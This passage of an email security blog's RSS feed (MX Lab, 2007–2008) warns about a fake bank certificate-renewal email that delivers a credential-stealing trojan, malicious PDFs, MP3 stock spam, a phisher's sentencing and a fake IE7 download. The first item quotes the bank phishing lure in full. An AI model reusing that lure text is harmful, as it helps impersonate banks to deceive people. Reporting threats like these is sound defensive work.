		<description><![CDATA[At first I thought of a new phishing email, based on the fact that it comes from a bank, includes a long URL in the body and it is related to your banking account where you need to renew your certificate. Connection-Colonial Bank Renewal Certificate Renewal Personal (Smartcard) e-Cert  Personal e-Cert Certificate owner must renew [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=66&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>At first I thought of a new phishing email, based on the fact that it comes from a bank, includes a long URL in the body and it is related to your banking account where you need to renew your certificate.</p>
<p><em>Connection-Colonial Bank Renewal</em></p>
<p><em>Certificate Renewal<br />
Personal (Smartcard) e-Cert  Personal e-Cert<br />
Certificate owner must renew the certificate before expiry date.<br />
Your certificate expiration date &#8211; 1may 2008.<br />
The system will send email (Certificate Renewal Notice) to the certificate owner ten days and 3 hours before the certificate is due to expire, if it has not been renewed. Upon receiving the renewal notice, certificate owner is required to connect to Colonial Bank Certificate Management System and present the client certificate. Secure Server e-Cert  Developer e-Cert<br />
Certificate owner has the responsibility to renew the certificate before expiry date. Successful renewed application will receive an email notification from Colonial Bank. Applicant can just browse to the URL stated in the email and then download the certificate.</em></p>
<p><em>Download now </em></p>
<p><em>2003 Colonial Bank, N.A.</em></p>
<p>Further investigation show us that it is indeed a technique to distribute malware. The download URL doesn&#8217;t give a login screen but takes you to a web site where you need to download the certificate and this is an .exe.</p>
<p><img src="http://www.mxlab.be/img_news/20080421_malware_s.gif" alt="" width="340" height="460" /></p>
<p>The download gives us an Colonial_CertificateUpdate04192008.exe and is in fact the Trojan-PSW.Win32.Papras. This trojan steals login credentials and other sensitive information on the compromised system. It also drops and uses a rootkit driver to hide itself. The rootkit driver is detected as Rootkit.Win32.Agent.SZ.</p>
<p>As always, take extra attention if you receive these kind of formatted emails.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/66/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/66/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/66/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=66&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2008/04/21/malware-distribution-techniques/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.be/img_news/20080421_malware_s.gif" medium="image" />
	</item>
		<item>
		<title>Maliciously crafted PDF files that opens door for trojan</title>
		<link>http://blog.mxlab.eu/2007/10/27/maliciously-crafted-pdf-files-that-opens-door-for-trojan/</link>
		<comments>http://blog.mxlab.eu/2007/10/27/maliciously-crafted-pdf-files-that-opens-door-for-trojan/#comments</comments>
		<pubDate>Sat, 27 Oct 2007 12:01:51 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/2007/10/27/maliciously-crafted-pdf-files-that-opens-door-for-trojan/</guid>
		<description><![CDATA[MX Lab is detecting and intercepting an increased distribution of maliciously crafted PDF files. These PDF files contain an exploit that could result in a complete access to the infected computer and affects Windows XP or Windows 2003. When the PDF document is opened the Windows firewall will be disabled by using Netsh, a command-line [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=52&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.mxlab.be/en/news/news/2007/20071026_pdf_trojan.html" target="_blank">MX Lab</a> is detecting and intercepting an increased distribution of maliciously crafted PDF files. These PDF files contain an exploit that could result in a complete access to the infected computer and affects Windows XP or Windows 2003.</p>
<p>When the PDF document is opened the Windows firewall will be disabled by using Netsh, a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. The code will start downloading a trojan from the internet which may allow the attacker to take control over the infected computer.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/52/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/52/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/52/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=52&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2007/10/27/maliciously-crafted-pdf-files-that-opens-door-for-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>MP3 based stock spam outbreak</title>
		<link>http://blog.mxlab.eu/2007/10/18/mp3-based-stock-spam-outbreak/</link>
		<comments>http://blog.mxlab.eu/2007/10/18/mp3-based-stock-spam-outbreak/#comments</comments>
		<pubDate>Thu, 18 Oct 2007 20:35:31 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[mp3]]></category>
		<category><![CDATA[mp3 spam]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/2007/10/18/mp3-based-stock-spam-outbreak/</guid>
		<description><![CDATA[After the PDF, Excel and ZIP based spam outbreaks we now have a stock spam outbreak based on the popular MP3 format for delivering audio. The messages are between 85kB and 150kB and contain an MP3 in poor quality at a 16 kbps bitrate and 11 KHz sample rate with an average length of 30 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=51&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>After the PDF, Excel and ZIP based spam outbreaks we now have a stock spam outbreak based on the popular MP3 format for delivering audio. The messages are between 85kB and 150kB and contain an MP3 in poor quality at a 16 kbps bitrate and 11 KHz sample rate with an average length of 30 seconds. T avoid email filters these files are highly randomized.</p>
<p>The attachment files names range from well known artists like smashingpumpkins.mp3, bbrown.mp3, bspears.mp3, gloriaestefan.mp3, beatles.mp3 to and some obvious poplar sound names like answeringmachine.mp3, coolringtone.mp3, listentothis.mp3. The subject only contains Fwd: or Re:.</p>
<p><a href="http://www.mxlab.be" target="_blank">MX Lab protects clients against this new form of spam with the Recurrent Pattern Technology ™ (RPD) from Commtouch®</a>. According to our technology partner Commtouch®, the outbreak accounts for around 7-10% of all spam, globally, over the past 18 hours. The first MP3 spams where detected on October 17, 2007, 21:24 GMT.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/51/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/51/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/51/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=51&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2007/10/18/mp3-based-stock-spam-outbreak/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Phisher Goodin sentenced to the prison for nearly six years</title>
		<link>http://blog.mxlab.eu/2007/06/16/phisher-sentenced-to-nearly-six-years-jail/</link>
		<comments>http://blog.mxlab.eu/2007/06/16/phisher-sentenced-to-nearly-six-years-jail/#comments</comments>
		<pubDate>Sat, 16 Jun 2007 23:29:36 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Phishing]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/2007/06/16/phisher-sentenced-to-nearly-six-years-jail/</guid>
		<description><![CDATA[Jeffrey Brett Goodin is sentenced to the prison for nearly six years and has to pay $1,002,885.58 to the victims of his phishing scheme, including nearly $1 million to Earthlink. Goodin was found guilty after a week-long jury trial for sending thousands of e-mails through an Earthlink Internet connection to America Online users. The email [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=39&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Jeffrey Brett Goodin is sentenced to the prison for nearly six years and has to pay $1,002,885.58 to the victims of his phishing scheme, including nearly $1 million to Earthlink.</p>
<p>Goodin was found guilty after a week-long jury trial for sending thousands of e-mails through an Earthlink Internet connection to America Online users. The email was spoofed so that it appeared to be from AOL’s billing department. AOL customers where asked to update their personal and credit card information on AOL webpages that Goodin controlled. With the information, Gooding made unauthorized credit card purchases.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/39/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/39/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/39/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=39&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2007/06/16/phisher-sentenced-to-nearly-six-years-jail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Fake Internet Explorer 7 Downloads spam</title>
		<link>http://blog.mxlab.eu/2007/03/30/fake-internet-explorer-7-downloads-spam/</link>
		<comments>http://blog.mxlab.eu/2007/03/30/fake-internet-explorer-7-downloads-spam/#comments</comments>
		<pubDate>Fri, 30 Mar 2007 20:31:17 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/2007/03/30/fake-internet-explorer-7-downloads-spam/</guid>
		<description><![CDATA[MX Lab issues a warning for an email messages that is offering you to download the latest version of Internet Explorer 7. This email contains a link to an .exe file that is in fact a trojan. Read the security warning on the MX Lab web site.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=31&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab issues a warning for an email messages that is offering you to download the latest version of Internet Explorer 7. This email contains a link to an .exe file that is in fact a trojan.</p>
<p><img src="http://www.mxlab.be/img_news/ie7_download_trojan.gif" alt="Fake Internet Explorer 7 Downloads is trojan" /></p>
<p><a href="http://www.mxlab.be/en/news/news/2007/20070329_internet_explorer_7_trojan.html" target="_blank">Read the security warning</a> on the MX Lab web site.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/31/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/31/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/31/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=31&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2007/03/30/fake-internet-explorer-7-downloads-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.be/img_news/ie7_download_trojan.gif" medium="image">
			<media:title type="html">Fake Internet Explorer 7 Downloads is trojan</media:title>
		</media:content>
	</item>
	</channel>
</rss>